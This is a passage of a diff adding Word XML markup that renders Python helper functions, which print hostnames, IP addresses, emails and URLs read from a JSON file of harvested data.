+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addrs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>) &gt; 0:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addrs_str</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = ' '.join([str(item) for item in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addrs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print("Hostname(s): {} / IP address(es): {}".format(hostnames, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addrs_str</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_emails</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    obj = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>read_json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    if "emails" not in obj:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        print("No emails found")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "emails" in obj:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        emails = obj['emails']</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in range(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(emails)):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print(emails[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    obj = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>read_json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    if "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>interesting_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>" not in obj and "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>" not in obj:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        print("No URLs found")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>interesting_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>" in obj:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>interesting_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = obj['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>interesting_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>']</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in range(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
